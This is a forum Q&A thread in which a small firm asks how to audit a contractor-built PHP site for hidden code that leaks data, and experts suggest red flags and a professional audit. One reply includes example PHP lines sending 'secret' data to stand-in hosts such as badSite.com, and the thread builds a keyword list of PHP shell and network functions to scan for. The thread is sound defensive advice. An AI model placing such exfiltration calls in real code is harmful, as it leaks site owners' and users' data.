?
Solved

Is there a way to verify a check if there suspicious in a web site developed in PHP

Posted on 2011-10-27
15
Medium Priority
?
490 Views
Last Modified: 2013-12-25
Where should we look in within a web site developed in PHP from for us to find if there is any malicious code leaking information from our site.  Beside PHP, Java, CGI, etc.
0
Comment
Question by:rayluvs
  • 7
  • 2
  • 2
  • +3
15 Comments
 

Author Comment

by:rayluvs
ID: 37043116
More info.

It was site developed for us and just turned in.  The site is more like a project & proposal site used by us.   We have doubt of one of the programmers from a conversation we overheard.

We copied the entire site contents from our FTP to our hard drive to make the search for any link hidden or calls outside our site, faster.

Basically what we want to know is what to look for in our code that would show us any connection to other sites or how to see if our data is being sent to or received from other site.

Hope we made our need clear.
0
 
LVL 36

Accepted Solution

by:
Loganathan Natarajan earned 336 total points
ID: 37043123
The suspicious are many ways to inject to the website , i have experienced some ways like IFRAME, JAVASCRIPT way to redirect, some encrypted tags, code in between the texts and HTML tags...

You can check,  search / verify the IFRAME whether it is being injected on the whole page text/content..
0
 
LVL 36

Expert Comment

by:Loganathan Natarajan
ID: 37043145
also you may consider to use some tools to scan the entire website code. so that you can find the details.
0
Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 

Author Comment

by:rayluvs
ID: 37043173
Can we make a search for key words that would flag us possible bad coding ?  Since all the files are text, we figure if we search any keywords and found one, this would rais a black flag.  After we identify all keyword we'll proceed to google more of info pertaining to the message appeared

0
 
LVL 4

Assisted Solution

by:kyanwan
kyanwan earned 668 total points
ID: 37043207
With code - it will most likely require an actual audit of your code to find out if any information is leaked externally.   A simple search - will most likely not net good results, as any malicious programmer would make it hard to pattern match.  

Things to keep an eye out for -

- Code that was not requested ( Did you say PHP only?  Do you see code that does not belong?  Unrequested Javascript? )
- Extern / system calls - Check what is being executed.  Find out what it is.  If you can not tell what is being executed, that's a huge red flag.
- Files & output - Look for any writing to disk.   Are files being saved to public access area or FTP accessible areas?   What kind of information is written to these files?  
- IP addresses, URIs - look for any internet addresses.  Look for decimal format IP addresses.
- Obfuscation - Do you see any areas of code that are difficult to read?  These should be scrutinized with a fine tooth comb.  

What I would strongly suggest (this is what I personally would do, if I were unfamiliar or uncomfortable with a language) is to have a completely unrelated third party audit the code.  I HIGHLY suggest to let someone who knows what they are looking for ... look for it.  This is especially vital if you are held to a high security standard - or if you are in a position to face financial loss in case of data breach.  ( such as - you're a merchant, or have private information to protect. )   The initial investment of protecting yourself - is a very smart investment.
0
 
LVL 84

Expert Comment

by:Dave Baldwin
ID: 37043274
I agree with @kyanwan, if you don't have the ability to write the code yourself, then you should have someone else audit it.  I know I could put things in PHP and javascript that a novice could not find.
0
 
LVL 111

Assisted Solution

by:Ray Paseur
Ray Paseur earned 332 total points
ID: 37044827
If you are able to get him, this fellow is one of the leading experts in PHP security and he will be able to audit the code for you.  Expect to pay $XX,000 plus expenses, but you will get the peace-of-mind that comes from an iron-clad, expert response.
http://shiflett.org/

If you cannot get Chris, you want to make a Google search for "PHP Security" and try to get someone else who is a noted author and speaker.

The point is, as kyanwan and Dave suggest, that you do not know what you do not know.  Specialized skills and knowledge are required to find the sorts of things that you must find if you want a secure system.  As the noted fire fighter Red Adair once said, "If you think it's expensive to hire a professional, just wait until you hire an amateur!"

Best of luck, ~Ray
0
 

Author Comment

by:rayluvs
ID: 37045538
Thank you very much on this valuable info.

Regarding contracting a professional to validate our site; is a great recommendation.  However, the investment is not justified for us for the following reasons:

         - We are not a big firm
         - the contents developed is not a complex contents
         - not that security sensitive
         - the total size is not over 3mb
         - is not live yet

What we're looking for is more like the details provided by kyanwan in the first part of ID: 37043207.  

We are not experts in some tech areas, but with EE assistance we have successfully done a series of tasks that we would have not been able to do before.  This site is Excellent!

We are not looking for an actual step-by-step of a "How-To" detecte flaws or leaks, but something like  kyanwan in the first part of ID: 3704320; a guidance of where to look.

For example, when we contract a VB programmer, prior going live with the apps developed, we look at the code for all connections, external calls to other apps or ips to make sure that the cobtrol stays where we want.  For example the SQL connections, calls of other apps or ascii files that may input or output data for creating connections, IPs, we even look at functions to see if it create values for accessing other areas (we found once a function using char(x) until it spells out actual address), stuff like this.

In web, that's what we are trying to do to prior going live.

A little more info

The contents is compose of (by file types):

   - Cascading Style Sheet Document (1 file)
   - Icon (16)
   - JS File (3)
   - PNG File (40)
   - JPEG image (1)
   - GIF file (1)
   - HTML Document (1)
   - PHP File (29)

Can you gives some actual names to look for or logic flow, anything that would help us to just look. It's riot a big apps so we are willing to invest some time.

Please advice.
0
 
LVL 34

Assisted Solution

by:Slick812
Slick812 earned 664 total points
ID: 37050447
greetings Ramante, in your post ID:37045538 , you may not need to look at the image files (gif, jpg, png, icon) or the css (if there is malicious code in these you are in way over your head - my opinion), and you will need to look at the javacsript php and maybe the html.
First , I see as important what you will do (the action you take, as to the developer and your organization) if you find something that you think "might be" malicious code leaking information, as opposed to "definitely bad" malicious code leaking information, which may have you ask the developer what the code is doing, or just get another developer to do your site again.

Thee are so many ways to send info to other places, as in "malicious code leaking information", , for instance you can just connect to a remote database (mySQL, windows databases, and others) and insert your data into that data base, so someone else can use your data, without your permission or knowledge.
There are several ways to connect and send/receive data in PHP and other serverside code base, there is SOAP -
$Trans = new SoapClient("http://www.notMySite.com/steal/?ser=takeAll");

also it is posible to send data to another place just by requesting a page, and using a GET

$myData = "Secret_Valuable_Information";
$page = file_get_contents('http://www.badSite.com/?info='.$myData);
use
but as has been mentioned, you can mix and match code segments in PHP to "Hide" or Obfuscation so that searching for text may not show you much "Malicious Code"
0
 

Author Comment

by:rayluvs
ID: 37050756
Thanx Slick812, yes something like that.  What we are looking for are keywords, not actual strings.  For example, we finished checking the site contents file which are in PHP, Java, Cgi, etc, since they are text, for keywords as:

   "connect"
   ip values (search for xxx.xxx.xxx)
   "MySql"
   "get"
   "select"
   "insert"
   "system("
   "passthru("
   "\"
   " exec("
 
Also just finished incorporating your keywords:

   "file_get_contents"
   "soap"

In essences we would like from EE first hand experience of specific commands in PHP/Java/Ajax/Ect.  that would either Saves to Files, Open Paths, Saves to Database, etc.

We want to compile and setup some sort of "checklist" of word to look for and then identify is if being used correctly in our site.  

What we need is example of command word.

Thanx
0
 
LVL 4

Assisted Solution

by:kyanwan
kyanwan earned 668 total points
ID: 37052021
By the description of your data that you've done - I've got a feeling that your code is most likely safe.  If your data, by your own recognition, is not that valuable ... chances are the programmer will value future work from you more than some seemingly worthless information.

-------

One other thing --Do not ignore the output of your site.   A malicious coder could always take what they want, and put it secretly right out in the open to pick up later.  Try to find any blocks of code that seemingly do nothing, or modify page output in minute & inconsistent ways.  ( Read more : http://en.wikipedia.org/wiki/Covert_channel  ; in summary, look for I/O that has no value to your program in your code.   If you find it, take a second and third look at it - no matter how irrelevant it may seem. )

If you have a block of code that changes output based on variables that you consider your more 'critical" information, that should be suspect & checked over.  If you can't think of a good explanation for the code - it's worth more scrutiny.  

For your output, to do some quick detection that's easy & low cost - get a multi-file text editor (like editplus, or even microsoft word if you copy paste the code) - and open 10-20 different output pages from your site.   Check for inconsistencies in the generated output from page-to-page.  ( A very easy way to do this - just have your captured data all open, flip through your tabs while scrolling down bit-by-bit , with each page in the same position. )
0
 

Author Comment

by:rayluvs
ID: 37053357
Thanx for the info.

Since all files the actually do processing within a site are text file, we are searching within them for names or commands that write/read to other site.

To close the question, and besides the keywords we are searching for (see ID: 37050756), can you guys give us any additional names of commands that would do the following:

      - Write to
      - Copy To
      - Read From
      - command that would send emails

Greatly appreciated
0
 
LVL 34

Assisted Solution

by:Slick812
Slick812 earned 664 total points
ID: 37070481
I am posting here, just to give a few ideas for PHP methods I can think of that I remember for network (web) transfer of data, the main two (in my mind) would be -
curl_init( )   ,   socket_create ( )

some others -
ldap_connect( )   ,  ftp_connect( )   ,  ftp_ssl_connect( )

but there are so many ways to web transfer, that I don't think of others right now, ,  of course you could always just send an email with  mail( )

you may want to look more closely at the code places that deal with the DATA that you consider valuable and see if there are any references to web addresses or IP numbers that are not associated with your site.
0
 

Author Comment

by:rayluvs
ID: 37090917
Ok thanks all.  We think we got a very valuable info from your guys
0
 

Author Closing Comment

by:rayluvs
ID: 37090980
Thanx
0

Featured Post

VIDEO: THE CONCERTO CLOUD FOR HEALTHCARE

Modern healthcare requires a modern cloud. View this brief video to understand how the Concerto Cloud for Healthcare can help your organization.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

These days socially coordinated efforts have turned into a critical requirement for enterprises.
In threads here at EE, each comment has a unique Identifier (ID). It is easy to get the full path for an ID via the right-click context menu. However, we often want to post a short link within a thread rather than the full link. This article shows a…
Learn the basics of if, else, and elif statements in Python 2.7. Use "if" statements to test a specified condition.: The structure of an if statement is as follows: (CODE) Use "else" statements to allow the execution of an alternative, if the …
In a recent question (https://www.experts-exchange.com/questions/29004105/Run-AutoHotkey-script-directly-from-Notepad.html) here at Experts Exchange, a member asked how to run an AutoHotkey script (.AHK) directly from Notepad++ (aka NPP). This video…
Suggested Courses
Course of the Month16 days, 19 hours left to enroll

862 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question